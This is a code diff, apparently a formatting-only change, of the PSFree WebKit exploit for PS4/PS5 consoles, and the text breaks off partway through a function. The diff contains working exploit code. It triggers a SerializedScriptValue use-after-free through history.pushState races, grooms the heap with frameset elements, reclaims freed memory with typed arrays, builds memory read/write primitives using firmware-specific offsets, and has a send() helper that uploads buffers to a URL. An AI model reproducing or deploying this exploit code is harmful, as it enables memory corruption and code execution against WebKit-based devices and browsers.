// jstr() as well. they are likely working with functions that take/return
// strings
-export { jstr } from './utils.mjs';
+export { jstr } from "./utils.mjs";
diff --git a/src/module/rw.mjs b/src/module/rw.mjs
index 2075817..353a5f7 100644
--- a/src/module/rw.mjs
+++ b/src/module/rw.mjs
@@ -15,7 +15,7 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
-import { Int, lohi_from_one } from './int64.mjs';
+import { Int, lohi_from_one } from "./int64.mjs";
// DataView's accessors are constant time and are faster when doing multi-byte
// accesses but the single-byte accessors are slightly slower compared to just
@@ -27,39 +27,36 @@ import { Int, lohi_from_one } from './int64.mjs';
// instances of BufferView will their have m_mode set to WastefulTypedArray
// since we use the .buffer getter to create a DataView
export class BufferView extends Uint8Array {
- constructor(...args) {
- super(...args);
- this._dview = new DataView(this.buffer, this.byteOffset);
- }
+ constructor(...args) {
+ super(...args);
+ this._dview = new DataView(this.buffer, this.byteOffset);
+ }
- read16(offset) {
- return this._dview.getUint16(offset, true);
- }
+ read16(offset) {
+ return this._dview.getUint16(offset, true);
+ }
- read32(offset) {
- return this._dview.getUint32(offset, true);
- }
+ read32(offset) {
+ return this._dview.getUint32(offset, true);
+ }
- read64(offset) {
- return new Int(
- this._dview.getUint32(offset, true),
- this._dview.getUint32(offset + 4, true),
- );
- }
+ read64(offset) {
+ return new Int(this._dview.getUint32(offset, true), this._dview.getUint32(offset + 4, true));
+ }
- write16(offset, value) {
- this._dview.setUint16(offset, value, true);
- }
+ write16(offset, value) {
+ this._dview.setUint16(offset, value, true);
+ }
- write32(offset, value) {
- this._dview.setUint32(offset, value, true);
- }
+ write32(offset, value) {
+ this._dview.setUint32(offset, value, true);
+ }
- write64(offset, value) {
- const values = lohi_from_one(value);
- this._dview.setUint32(offset, values[0], true);
- this._dview.setUint32(offset + 4, values[1], true);
- }
+ write64(offset, value) {
+ const values = lohi_from_one(value);
+ this._dview.setUint32(offset, values[0], true);
+ this._dview.setUint32(offset + 4, values[1], true);
+ }
}
// WARNING: These functions are now deprecated. use BufferView instead.
@@ -88,53 +85,53 @@ export class BufferView extends Uint8Array {
// for reads less than 8 bytes
function read(u8_view, offset, size) {
- let res = 0;
- for (let i = 0; i < size; i++) {
- res += u8_view[offset + i] << i*8;
- }
- // << returns a signed integer, >>> converts it to unsigned
- return res >>> 0;
+ let res = 0;
+ for (let i = 0; i < size; i++) {
+ res += u8_view[offset + i] << (i * 8);
+ }
+ // << returns a signed integer, >>> converts it to unsigned
+ return res >>> 0;
}
export function read16(u8_view, offset) {
- return read(u8_view, offset, 2);
+ return read(u8_view, offset, 2);
}
export function read32(u8_view, offset) {
- return read(u8_view, offset, 4);
+ return read(u8_view, offset, 4);
}
export function read64(u8_view, offset) {
- return new Int(read32(u8_view, offset), read32(u8_view, offset + 4));
+ return new Int(read32(u8_view, offset), read32(u8_view, offset + 4));
}
// for writes less than 8 bytes
function write(u8_view, offset, value, size) {
- for (let i = 0; i < size; i++) {
- u8_view[offset + i] = (value >>> i*8) & 0xff;
- }
+ for (let i = 0; i < size; i++) {
+ u8_view[offset + i] = (value >>> (i * 8)) & 0xff;
+ }
}
export function write16(u8_view, offset, value) {
- write(u8_view, offset, value, 2);
+ write(u8_view, offset, value, 2);
}
export function write32(u8_view, offset, value) {
- write(u8_view, offset, value, 4);
+ write(u8_view, offset, value, 4);
}
export function write64(u8_view, offset, value) {
- if (!(value instanceof Int)) {
- throw TypeError('write64 value must be an Int');
- }
+ if (!(value instanceof Int)) {
+ throw TypeError("write64 value must be an Int");
+ }
- let low = value.lo;
- let high = value.hi;
+ let low = value.lo;
+ let high = value.hi;
- for (let i = 0; i < 4; i++) {
- u8_view[offset + i] = (low >>> i*8) & 0xff;
- }
- for (let i = 0; i < 4; i++) {
- u8_view[offset + 4 + i] = (high >>> i*8) & 0xff;
- }
+ for (let i = 0; i < 4; i++) {
+ u8_view[offset + i] = (low >>> (i * 8)) & 0xff;
+ }
+ for (let i = 0; i < 4; i++) {
+ u8_view[offset + 4 + i] = (high >>> (i * 8)) & 0xff;
+ }
}
diff --git a/src/module/utils.mjs b/src/module/utils.mjs
index 7c20ef1..cf4a031 100644
--- a/src/module/utils.mjs
+++ b/src/module/utils.mjs
@@ -15,158 +15,150 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
-import { Int } from './int64.mjs';
+import { Int } from "./int64.mjs";
export class DieError extends Error {
- constructor(...args) {
- super(...args);
- this.name = this.constructor.name;
- }
+ constructor(...args) {
+ super(...args);
+ this.name = this.constructor.name;
+ }
}
-export function die(msg='') {
- throw new DieError(msg);
+export function die(msg = "") {
+ throw new DieError(msg);
}
-const console = document.getElementById('console');
-export function log(msg='') {
- console.append(msg + '\n');
+const console = document.getElementById("console");
+export function log(msg = "") {
+ console.append(`${msg}\n`);
}
export function clear_log() {
- console.innerHTML = null;
+ console.innerHTML = null;
}
// alignment must be 32 bits and is a power of 2
export function align(a, alignment) {
- if (!(a instanceof Int)) {
- a = new Int(a);
- }
- const mask = -alignment & 0xffffffff;
- let type = a.constructor;
- let low = a.lo & mask;
- return new type(low, a.hi);
+ if (!(a instanceof Int)) {
+ a = new Int(a);
+ }
+ const mask = -alignment & 0xffffffff;
+ let type = a.constructor;
+ let low = a.lo & mask;
+ return new type(low, a.hi);
}
-export async function send(url, buffer, file_name, onload=() => {}) {
- const file = new File(
- [buffer],
- file_name,
- {type:'application/octet-stream'}
- );
- const form = new FormData();
- form.append('upload', file);
+export async function send(url, buffer, file_name, onload = () => {}) {
+ const file = new File([buffer], file_name, { type: "application/octet-stream" });
+ const form = new FormData();
+ form.append("upload", file);
- log('send');
- const response = await fetch(url, {method: 'POST', body: form});
+ log("send");
+ const response = await fetch(url, { method: "POST", body: form });
- if (!response.ok) {
- throw Error(`Network response was not OK, status: ${response.status}`);
- }
- onload();
+ if (!response.ok) {
+ throw Error(`Network response was not OK, status: ${response.status}`);
+ }
+ onload();
}
// mostly used to yield to the GC. marking is concurrent but collection isn't
//
// yielding also lets the DOM update. which is useful since we use the DOM for
// logging and we loop when waiting for a collection to occur
-export function sleep(ms=0) {
- return new Promise(resolve => setTimeout(resolve, ms));
+export function sleep(ms = 0) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
}
export function hex(number) {
- return '0x' + number.toString(16);
+ return `0x${number.toString(16)}`;
}
// no "0x" prefix
export function hex_np(number) {
- return number.toString(16);
+ return number.toString(16);
}
// expects a byte array
export function hexdump(view) {
- const num_16 = view.length & ~15;
- const residue = view.length - num_16;
- const max_off_len = hex_np(((view.length + 7) & ~7) - 1).length;
+ const num_16 = view.length & ~15;
+ const residue = view.length - num_16;
+ const max_off_len = hex_np(((view.length + 7) & ~7) - 1).length;
- function chr(i) {
- if (0x20 <= i && i <= 0x7e) {
- return String.fromCodePoint(i);
- }
- return '.';
+ function chr(i) {
+ if (0x20 <= i && i <= 0x7e) {
+ return String.fromCodePoint(i);
+ }
+ return ".";
+ }
+
+ function to_hex(view, offset, length) {
+ return [...view.slice(offset, offset + length)].map((e) => hex_np(e).padStart(2, "0")).join(" ");
+ }
+
+ let bytes = [];
+ for (let i = 0; i < num_16; i += 16) {
+ const long1 = to_hex(view, i, 8);
+ const long2 = to_hex(view, i + 8, 8);
+
+ let print = "";
+ for (let j = 0; j < 16; j++) {
+ print += chr(view[j]);
}
- function to_hex(view, offset, length) {
- return (
- [...view.slice(offset, offset + length)]
- .map(e => hex_np(e).padStart(2, '0'))
- .join(' ')
- );
+ bytes.push([`${long1} ${long2}`, print]);
+ }
+
+ if (residue) {
+ const small = residue <= 8;
+ const long1_len = small ? residue : 8;
+
+ let long1 = to_hex(view, num_16, long1_len);
+ if (small) {
+ for (let i = 0; i < 8 - residue; i++) {
+ long1 += " xx";
+ }
}
- let bytes = [];
- for (let i = 0; i < num_16; i += 16) {
- const long1 = to_hex(view, i, 8);
- const long2 = to_hex(view, i + 8, 8);
+ const long2 = (() => {
+ if (small) {
+ return Array(8).fill("xx").join(" ");
+ }
- let print = '';
- for (let j = 0; j < 16; j++) {
- print += chr(view[j]);
- }
+ let res = to_hex(view, num_16 + 8, residue - 8);
+ for (let i = 0; i < 16 - residue; i++) {
+ res += " xx";
+ }
- bytes.push([`${long1} ${long2}`, print]);
+ return res;
+ })();
+
+ let print = "";
+ for (let i = 0; i < residue; i++) {
+ print += chr(view[num_16 + i]);
+ }
+ for (let i = 0; i < 16 - residue; i++) {
+ print += " ";
}
- if (residue) {
- const small = residue <= 8;
- const long1_len = small ? residue : 8;
+ bytes.push([`${long1} ${long2}`, print]);
+ }
- let long1 = to_hex(view, num_16, long1_len);
- if (small) {
- for (let i = 0; i < 8 - residue; i++) {
- long1 += ' xx';
- }
- }
-
- const long2 = (() => {
- if (small) {
- return Array(8).fill('xx').join(' ');
- }
-
- let res = to_hex(view, num_16 + 8, residue - 8);
- for (let i = 0; i < 16 - residue; i++) {
- res += ' xx';
- }
-
- return res;
- })();
-
- let print = '';
- for (let i = 0; i < residue; i++) {
- print += chr(view[num_16 + i]);
- }
- for (let i = 0; i < 16 - residue; i++) {
- print += ' ';
- }
-
- bytes.push([`${long1} ${long2}`, print]);
- }
-
- for (const [pos, [val, print]] of bytes.entries()) {
- const off = hex_np(pos * 16).padStart(max_off_len, '0');
- log(`${off} | ${val} |${print}|`);
- }
+ for (const [pos, [val, print]] of bytes.entries()) {
+ const off = hex_np(pos * 16).padStart(max_off_len, "0");
+ log(`${off} | ${val} |${print}|`);
+ }
}
// make a JavaScript string
export function jstr(buffer) {
- let res = '';
- for (const item of buffer) {
- if (item === 0) {
- break;
- }
- res += String.fromCodePoint(item);
+ let res = "";
+ for (const item of buffer) {
+ if (item === 0) {
+ break;
}
- // convert to primitive string
- return String(res);
+ res += String.fromCodePoint(item);
+ }
+ // convert to primitive string
+ return String(res);
}
diff --git a/src/module/view.mjs b/src/module/view.mjs
index ca79182..6dc1000 100644
--- a/src/module/view.mjs
+++ b/src/module/view.mjs
@@ -15,12 +15,12 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see . */
-import { Int, lohi_from_one } from './int64.mjs';
-import { Addr } from './mem.mjs';
-import { BufferView } from './rw.mjs';
+import { Int, lohi_from_one } from "./int64.mjs";
+import { Addr } from "./mem.mjs";
+import { BufferView } from "./rw.mjs";
-import * as config from '../config.mjs';
-import * as mt from './memtools.mjs';
+import * as config from "../config.mjs";
+import * as mt from "./memtools.mjs";
// View constructors will always get the buffer property in order to make sure
// that the JSArrayBufferView is a WastefulTypedArray. m_vector may change if
@@ -36,61 +36,61 @@ import * as mt from './memtools.mjs';
// get_view_vector() still works on them.
function ViewMixin(superclass) {
- const res = class extends superclass {
- constructor(...args) {
- super(...args);
- this.buffer;
- }
-
- get addr() {
- let res = this._addr_cache;
- if (res !== undefined) {
- return res;
- }
- res = mt.get_view_vector(this);
- this._addr_cache = res;
- return res;
- }
-
- get size() {
- return this.byteLength;
- }
-
- addr_at(index) {
- const size = this.BYTES_PER_ELEMENT;
- return this.addr.add(index * size);
- }
-
- sget(index) {
- return this[index] | 0;
- }
- };
-
- // workaround for known affected versions: ps4 [6.00, 10.00)
- //
- // see from() and of() from
- // WebKit/Source/JavaScriptCore/builtins/TypedArrayConstructor.js at PS4
- // 8.0x
- //
- // @getByIdDirectPrivate(this, "allocateTypedArray") will fail when "this"
- // isn't one of the built-in TypedArrays. this is a violation of the
- // ECMAScript spec at that time
- //
- // TODO: Assumes PS4, support PS5 as well
- // FIXME: Define the from/of workaround functions once
- if (0x600 <= config.target && config.target < 0x1000) {
- res.from = function from(...args) {
- const base = this.__proto__;
- return new this(base.from(...args).buffer);
- };
-
- res.of = function of(...args) {
- const base = this.__proto__;
- return new this(base.of(...args).buffer);
- };
+ const res = class extends superclass {
+ constructor(...args) {
+ super(...args);
+ this.buffer;
}
- return res;
+ get addr() {
+ let res = this._addr_cache;
+ if (res !== undefined) {
+ return res;
+ }
+ res = mt.get_view_vector(this);
+ this._addr_cache = res;
+ return res;
+ }
+
+ get size() {
+ return this.byteLength;
+ }
+
+ addr_at(index) {
+ const size = this.BYTES_PER_ELEMENT;
+ return this.addr.add(index * size);
+ }
+
+ sget(index) {
+ return this[index] | 0;
+ }
+ };
+
+ // workaround for known affected versions: ps4 [6.00, 10.00)
+ //
+ // see from() and of() from
+ // WebKit/Source/JavaScriptCore/builtins/TypedArrayConstructor.js at PS4
+ // 8.0x
+ //
+ // @getByIdDirectPrivate(this, "allocateTypedArray") will fail when "this"
+ // isn't one of the built-in TypedArrays. this is a violation of the
+ // ECMAScript spec at that time
+ //
+ // TODO: Assumes PS4, support PS5 as well
+ // FIXME: Define the from/of workaround functions once
+ if (0x600 <= config.target && config.target < 0x1000) {
+ res.from = function from(...args) {
+ const base = this.__proto__;
+ return new this(base.from(...args).buffer);
+ };
+
+ res.of = function of(...args) {
+ const base = this.__proto__;
+ return new this(base.of(...args).buffer);
+ };
+ }
+
+ return res;
}
export class View1 extends ViewMixin(Uint8Array) {}
@@ -98,58 +98,59 @@ export class View2 extends ViewMixin(Uint16Array) {}
export class View4 extends ViewMixin(Uint32Array) {}
export class Buffer extends BufferView {
- get addr() {
- let res = this._addr_cache;
- if (res !== undefined) {
- return res;
- }
- res = mt.get_view_vector(this);
- this._addr_cache = res;
- return res;
+ get addr() {
+ let res = this._addr_cache;
+ if (res !== undefined) {
+ return res;
}
+ res = mt.get_view_vector(this);
+ this._addr_cache = res;
+ return res;
+ }
- get size() {
- return this.byteLength;
- }
+ get size() {
+ return this.byteLength;
+ }
- addr_at(index) {
- return this.addr.add(index);
- }
+ addr_at(index) {
+ return this.addr.add(index);
+ }
}
// see from() and of() comment above
if (0x600 <= config.target && config.target < 0x1000) {
- Buffer.from = function from(...args) {
- const base = this.__proto__;
- return new this(base.from(...args).buffer);
- };
- Buffer.of = function of(...args) {
- const base = this.__proto__;
- return new this(base.of(...args).buffer);
- };
+ Buffer.from = function from(...args) {
+ const base = this.__proto__;
+ return new this(base.from(...args).buffer);
+ };
+ Buffer.of = function of(...args) {
+ const base = this.__proto__;
+ return new this(base.of(...args).buffer);
+ };
}
-const VariableMixin = superclass => class extends superclass {
- constructor(value=0) {
- // unlike the View classes, we don't allow number coercion. we
- // explicitly allow floats unlike Int
- if (typeof value !== 'number') {
- throw TypeError('value not a number');
- }
- super([value]);
+const VariableMixin = (superclass) =>
+ class extends superclass {
+ constructor(value = 0) {
+ // unlike the View classes, we don't allow number coercion. we
+ // explicitly allow floats unlike Int
+ if (typeof value !== "number") {
+ throw TypeError("value not a number");
+ }
+ super([value]);
}
addr_at(...args) {
- throw TypeError('unimplemented method');
+ throw TypeError("unimplemented method");
}
[Symbol.toPrimitive](hint) {
- return this[0];
+ return this[0];
}
toString(...args) {
- return this[0].toString(...args);
+ return this[0].toString(...args);
}
-};
+ };
export class Byte extends VariableMixin(View1) {}
export class Short extends VariableMixin(View2) {}
@@ -157,105 +158,103 @@ export class Short extends VariableMixin(View2) {}
export class Word extends VariableMixin(View4) {}
export class LongArray {
- constructor(length) {
- this.buffer = new DataView(new ArrayBuffer(length * 8));
- }
+ constructor(length) {
+ this.buffer = new DataView(new ArrayBuffer(length * 8));
+ }
- get addr() {
- return mt.get_view_vector(this.buffer);
- }
+ get addr() {
+ return mt.get_view_vector(this.buffer);
+ }
- addr_at(index) {
- return this.addr.add(index * 8);
- }
+ addr_at(index) {
+ return this.addr.add(index * 8);
+ }
- get length() {
- return this.buffer.length / 8;
- }
+ get length() {
+ return this.buffer.length / 8;
+ }
- get size() {
- return this.buffer.byteLength;
- }
+ get size() {
+ return this.buffer.byteLength;
+ }
- get byteLength() {
- return this.size;
- }
+ get byteLength() {
+ return this.size;
+ }
- get(index) {
- const buffer = this.buffer;
- const base = index * 8;
- return new Int(
- buffer.getUint32(base, true),
- buffer.getUint32(base + 4, true),
- );
- }
+ get(index) {
+ const buffer = this.buffer;
+ const base = index * 8;
+ return new Int(buffer.getUint32(base, true), buffer.getUint32(base + 4, true));
+ }
- set(index, value) {
- const buffer = this.buffer;
- const base = index * 8;
- const values = lohi_from_one(value);
+ set(index, value) {
+ const buffer = this.buffer;
+ const base = index * 8;
+ const values = lohi_from_one(value);
- buffer.setUint32(base, values[0], true);
- buffer.setUint32(base + 4, values[1], true);
- }
+ buffer.setUint32(base, values[0], true);
+ buffer.setUint32(base + 4, values[1], true);
+ }
}
// mutable Int (we are explicitly using Int's private fields)
-const Word64Mixin = superclass => class extends superclass {
+const Word64Mixin = (superclass) =>
+ class extends superclass {
constructor(...args) {
- if (!args.length) {
- return super(0);
- }
- super(...args);
+ if (!args.length) {
+ return super(0);
+ }
+ super(...args);
}
get addr() {
- // assume this is safe to cache
- return mt.get_view_vector(this._u32);
+ // assume this is safe to cache
+ return mt.get_view_vector(this._u32);
}
get length() {
- return 1;
+ return 1;
}
get size() {
- return 8;
+ return 8;
}
get byteLength() {
- return 8;
+ return 8;
}
// no setters for top and bot since low/high can accept negative integers
get lo() {
- return super.lo;
+ return super.lo;
}
set lo(value) {
- this._u32[0] = value;
+ this._u32[0] = value;
}
get hi() {
- return super.hi;
+ return super.hi;
}
set hi(value) {
- this._u32[1] = value;
+ this._u32[1] = value;
}
set(value) {
- const buffer = this._u32;
- const values = lohi_from_one(value);
+ const buffer = this._u32;
+ const values = lohi_from_one(value);
- buffer[0] = values[0];
- buffer[1] = values[1];
+ buffer[0] = values[0];
+ buffer[1] = values[1];
}
-};
+ };
export class Long extends Word64Mixin(Int) {
- as_addr() {
- return new Addr(this);
- }
+ as_addr() {
+ return new Addr(this);
+ }
}
export class Pointer extends Word64Mixin(Addr) {}
diff --git a/src/psfree.mjs b/src/psfree.mjs
index d9de195..84be2a1 100644
--- a/src/psfree.mjs
+++ b/src/psfree.mjs
@@ -33,61 +33,53 @@ along with this program. If not, see . */
// * Helped in figuring out the size of JSC::ArrayBufferContents and its
// needed offsets on different firmwares (PS5).
-import { Int } from './module/int64.mjs';
-import { Memory } from './module/mem.mjs';
-import { KB, MB } from './module/offset.mjs';
-import { BufferView } from './module/rw.mjs';
+import { Int } from "./module/int64.mjs";
+import { Memory } from "./module/mem.mjs";
+import { KB, MB } from "./module/offset.mjs";
+import { BufferView } from "./module/rw.mjs";
-import {
- die,
- DieError,
- log,
- clear_log,
- sleep,
- hex,
- align,
-} from './module/utils.mjs';
+import { die, DieError, log, clear_log, sleep, hex, align } from "./module/utils.mjs";
-import * as config from './config.mjs';
-import * as off from './module/offset.mjs';
+import * as config from "./config.mjs";
+import * as off from "./module/offset.mjs";
// check if we are running on a supported firmware version
const [is_ps4, version] = (() => {
- const value = config.target;
- const is_ps4 = (value & 0x10000) === 0;
- const version = value & 0xffff;
- const [lower, upper] = (() => {
- if (is_ps4) {
- return [0x600, 0x1000];
- } else {
- return [0x100, 0x600];
- }
- })();
-
- if (!(lower <= version && version < upper)) {
- throw RangeError(`invalid config.target: ${hex(value)}`);
+ const value = config.target;
+ const is_ps4 = (value & 0x10000) === 0;
+ const version = value & 0xffff;
+ const [lower, upper] = (() => {
+ if (is_ps4) {
+ return [0x600, 0x1000];
+ } else {
+ return [0x100, 0x600];
}
+ })();
- return [is_ps4, version];
+ if (!(lower <= version && version < upper)) {
+ throw RangeError(`invalid config.target: ${hex(value)}`);
+ }
+
+ return [is_ps4, version];
})();
const ssv_len = (() => {
- // All supported PS5 versions
- if (!is_ps4) {
- return 0x50;
- }
+ // All supported PS5 versions
+ if (!is_ps4) {
+ return 0x50;
+ }
- // PS4
- if (0x600 <= version && version < 0x650) {
- return 0x58;
- }
- if (0x650 <= version && version < 0x900) {
- return 0x48;
- }
- if (0x900 <= version) {
- return 0x50;
- }
- throw new RangeError(`unsupported console/firmware: ps${is_ps4 ? '4' : '5'}, version: ${hex(version)}`);
+ // PS4
+ if (0x600 <= version && version < 0x650) {
+ return 0x58;
+ }
+ if (0x650 <= version && version < 0x900) {
+ return 0x48;
+ }
+ if (0x900 <= version) {
+ return 0x50;
+ }
+ throw new RangeError(`unsupported console/firmware: ps${is_ps4 ? "4" : "5"}, version: ${hex(version)}`);
})();
// these constants are expected to be divisible by 2
@@ -129,66 +121,56 @@ const num_leaks = 0x100;
//
// const num_repeats = ssv_len / 8 - 2;
// const rows = ','.repeat(num_repeats);
-const rows = ','.repeat(ssv_len / 8 - 2);
+const rows = ",".repeat(ssv_len / 8 - 2);
const original_strlen = ssv_len - off.size_strimpl;
const original_loc = location.pathname;
function gc() {
- new Uint8Array(4 * MB);
+ new Uint8Array(4 * MB);
}
function sread64(str, offset) {
- const low = (
- str.charCodeAt(offset)
- | str.charCodeAt(offset + 1) << 8
- | str.charCodeAt(offset + 2) << 16
- | str.charCodeAt(offset + 3) << 24
- );
- const high = (
- str.charCodeAt(offset + 4)
- | str.charCodeAt(offset + 5) << 8
- | str.charCodeAt(offset + 6) << 16
- | str.charCodeAt(offset + 7) << 24
- );
- return new Int(low, high);
+ const low = str.charCodeAt(offset) | (str.charCodeAt(offset + 1) << 8) | (str.charCodeAt(offset + 2) << 16) | (str.charCodeAt(offset + 3) << 24);
+ const high = str.charCodeAt(offset + 4) | (str.charCodeAt(offset + 5) << 8) | (str.charCodeAt(offset + 6) << 16) | (str.charCodeAt(offset + 7) << 24);
+ return new Int(low, high);
}
function prepare_uaf() {
- const fsets = [];
- const indices = [];
+ const fsets = [];
+ const indices = [];
- function alloc_fs(fsets, size) {
- for (let i = 0; i < size / 2; i++) {
- const fset = document.createElement('frameset');
- fset.rows = rows;
- fset.cols = rows;
- fsets.push(fset);
- }
+ function alloc_fs(fsets, size) {
+ for (let i = 0; i < size / 2; i++) {
+ const fset = document.createElement("frameset");
+ fset.rows = rows;
+ fset.cols = rows;
+ fsets.push(fset);
}
+ }
- // the first call to either replaceState/pushState is likely to allocate a
- // JSC::IsoAlignedMemoryAllocator near the SSV it creates. this prevents
- // the SmallLine where the SSV resides from being freed. so we do a dummy
- // call first
- history.replaceState('state0', '');
+ // the first call to either replaceState/pushState is likely to allocate a
+ // JSC::IsoAlignedMemoryAllocator near the SSV it creates. this prevents
+ // the SmallLine where the SSV resides from being freed. so we do a dummy
+ // call first
+ history.replaceState("state0", "");
- alloc_fs(fsets, num_fsets);
+ alloc_fs(fsets, num_fsets);
- // the "state1" SSVs is what we will UAF
+ // the "state1" SSVs is what we will UAF
- history.pushState('state1', '', original_loc + '#bar');
- indices.push(fsets.length);
+ history.pushState("state1", "", `${original_loc}#bar`);
+ indices.push(fsets.length);
- alloc_fs(fsets, num_spaces);
+ alloc_fs(fsets, num_spaces);
- history.pushState('state1', '', original_loc + '#foo');
- indices.push(fsets.length);
+ history.pushState("state1", "", `${original_loc}#foo`);
+ indices.push(fsets.length);
- alloc_fs(fsets, num_spaces);
+ alloc_fs(fsets, num_spaces);
- history.pushState('state2', '');
- return [fsets, indices];
+ history.pushState("state2", "");
+ return [fsets, indices];
}
// WebCore::SerializedScriptValue use-after-free
@@ -197,414 +179,406 @@ function prepare_uaf() {
// called. History will cache the SSV at its m_lastStateObjectRequested if you
// do. that field is a RefPtr, thus preventing a UAF if we cache "state1"
async function uaf_ssv(fsets, index, index2) {
- const views = [];
- const input = document.createElement('input');
- input.id = 'input';
- const foo = document.createElement('input');
- foo.id = 'foo';
- const bar = document.createElement('a');
- bar.id = 'bar';
+ const views = [];
+ const input = document.createElement("input");
+ input.id = "input";
+ const foo = document.createElement("input");
+ foo.id = "foo";
+ const bar = document.createElement("a");
+ bar.id = "bar";
- log(`ssv_len: ${hex(ssv_len)}`);
+ log(`ssv_len: ${hex(ssv_len)}`);
- let pop = null;
- let pop2 = null;
- let pop_promise2 = null;
- let blurs = [0, 0];
- let resolves = [];
+ let pop = null;
+ let pop2 = null;
+ let pop_promise2 = null;
+ let blurs = [0, 0];
+ let resolves = [];
- function onpopstate(event) {
- const no_pop = pop === null;
- const idx = no_pop ? 0 : 1;
+ function onpopstate(event) {
+ const no_pop = pop === null;
+ const idx = no_pop ? 0 : 1;
- log(`pop ${idx} came`);
- if (blurs[idx] === 0) {
- const r = resolves[idx][1];
- r(new DieError(`blurs before pop ${idx} came: ${blurs[idx]}`));
- }
-
- if (no_pop) {
- pop_promise2 = new Promise((resolve, reject) => {
- resolves.push([resolve, reject]);
- addEventListener('popstate', onpopstate, {once: true});
- history.back();
- });
- }
-
- if (no_pop) {
- pop = event;
- } else {
- pop2 = event;
- }
- resolves[idx][0]();
+ log(`pop ${idx} came`);
+ if (blurs[idx] === 0) {
+ const r = resolves[idx][1];
+ r(new DieError(`blurs before pop ${idx} came: ${blurs[idx]}`));
}
- const pop_promise = new Promise((resolve, reject) => {
+ if (no_pop) {
+ pop_promise2 = new Promise((resolve, reject) => {
resolves.push([resolve, reject]);
- addEventListener('popstate', onpopstate, {once: true});
+ addEventListener("popstate", onpopstate, { once: true });
+ history.back();
+ });
+ }
+
+ if (no_pop) {
+ pop = event;
+ } else {
+ pop2 = event;
+ }
+ resolves[idx][0]();
+ }
+
+ const pop_promise = new Promise((resolve, reject) => {
+ resolves.push([resolve, reject]);
+ addEventListener("popstate", onpopstate, { once: true });
+ });
+
+ function onblur(event) {
+ const target = event.target;
+ const is_input = target === input;
+ const idx = is_input ? 0 : 1;
+ log(`${target.id} blur came`);
+
+ if (blurs[idx] > 0) {
+ die(`${name}: multiple blurs. blurs: ${blurs[idx]}`);
+ }
+
+ // we replace the URL with the original so the user can rerun the
+ // exploit via a reload. If we don't, the exploit will append another
+ // "#foo" to the URL and the input element will not be blurred because
+ // the foo element won't be scrolled to during history.back()
+ history.replaceState("state3", "", original_loc);
+
+ // free the SerializedScriptValue's neighbors and thus free the
+ // SmallLine where it resides
+ const fset_idx = is_input ? index : index2;
+ for (let i = fset_idx - num_adjs / 2; i < fset_idx + num_adjs / 2; i++) {
+ fsets[i].rows = "";
+ fsets[i].cols = "";
+ }
+
+ for (let i = 0; i < num_reuses; i++) {
+ const view = new Uint8Array(new ArrayBuffer(ssv_len));
+ view[0] = 0x41;
+ views.push(view);
+ }
+
+ blurs[idx]++;
+ }
+
+ input.addEventListener("blur", onblur);
+ foo.addEventListener("blur", onblur);
+
+ document.body.append(input);
+ document.body.append(foo);
+ document.body.append(bar);
+
+ // FrameLoader::loadInSameDocument() calls Document::statePopped().
+ // statePopped() will defer firing of popstate until we're in the complete
+ // state
+ //
+ // this means that onblur() will run with "state2" as the current history
+ // item if we call loadInSameDocument too early
+ log(`readyState now: ${document.readyState}`);
+
+ if (document.readyState !== "complete") {
+ await new Promise((resolve) => {
+ document.addEventListener("readystatechange", function foo() {
+ if (document.readyState === "complete") {
+ document.removeEventListener("readystatechange", foo);
+ resolve();
+ }
+ });
});
+ }
- function onblur(event) {
- const target = event.target;
- const is_input = target === input;
- const idx = is_input ? 0 : 1;
- log(`${target.id} blur came`);
+ log(`readyState now: ${document.readyState}`);
- if (blurs[idx] > 0) {
- die(`${name}: multiple blurs. blurs: ${blurs[idx]}`);
- }
+ await new Promise((resolve) => {
+ input.addEventListener("focus", resolve, { once: true });
+ input.focus();
+ });
- // we replace the URL with the original so the user can rerun the
- // exploit via a reload. If we don't, the exploit will append another
- // "#foo" to the URL and the input element will not be blurred because
- // the foo element won't be scrolled to during history.back()
- history.replaceState('state3', '', original_loc);
+ history.back();
+ await pop_promise;
+ await pop_promise2;
- // free the SerializedScriptValue's neighbors and thus free the
- // SmallLine where it resides
- const fset_idx = is_input ? index : index2;
- for (let i = fset_idx - num_adjs/2; i < fset_idx + num_adjs/2; i++) {
- fsets[i].rows = '';
- fsets[i].cols = '';
- }
+ log("done await popstate");
- for (let i = 0; i < num_reuses; i++) {
- const view = new Uint8Array(new ArrayBuffer(ssv_len));
- view[0] = 0x41;
- views.push(view);
- }
+ input.remove();
+ foo.remove();
+ bar.remove();
- blurs[idx]++;
+ const res = [];
+ for (let i = 0; i < views.length; i++) {
+ const view = views[i];
+ if (view[0] !== 0x41) {
+ log(`view index: ${hex(i)}`);
+ log("found view:");
+ log(view);
+
+ // set SSV's refcount to 1, all other fields to 0/NULL
+ view[0] = 1;
+ view.fill(0, 1);
+
+ if (res.length) {
+ res[1] = [new BufferView(view.buffer), pop2];
+ break;
+ }
+
+ // return without keeping any references to pop, making it GC-able.
+ // its WebCore::PopStateEvent will then be freed on its death
+ res[0] = new BufferView(view.buffer);
+ i = num_reuses - 1;
}
+ }
- input.addEventListener('blur', onblur);
- foo.addEventListener('blur', onblur);
-
- document.body.append(input);
- document.body.append(foo);
- document.body.append(bar);
-
- // FrameLoader::loadInSameDocument() calls Document::statePopped().
- // statePopped() will defer firing of popstate until we're in the complete
- // state
- //
- // this means that onblur() will run with "state2" as the current history
- // item if we call loadInSameDocument too early
- log(`readyState now: ${document.readyState}`);
-
- if (document.readyState !== 'complete') {
- await new Promise(resolve => {
- document.addEventListener('readystatechange', function foo() {
- if (document.readyState === 'complete') {
- document.removeEventListener('readystatechange', foo);
- resolve();
- }
- });
- });
- }
-
- log(`readyState now: ${document.readyState}`);
-
- await new Promise(resolve => {
- input.addEventListener('focus', resolve, {once: true});
- input.focus();
- });
-
- history.back();
- await pop_promise;
- await pop_promise2;
-
- log('done await popstate');
-
- input.remove();
- foo.remove();
- bar.remove();
-
- const res = [];
- for (let i = 0; i < views.length; i++) {
- const view = views[i];
- if (view[0] !== 0x41) {
- log(`view index: ${hex(i)}`);
- log('found view:');
- log(view);
-
- // set SSV's refcount to 1, all other fields to 0/NULL
- view[0] = 1;
- view.fill(0, 1);
-
- if (res.length) {
- res[1] = [new BufferView(view.buffer), pop2];
- break;
- }
-
- // return without keeping any references to pop, making it GC-able.
- // its WebCore::PopStateEvent will then be freed on its death
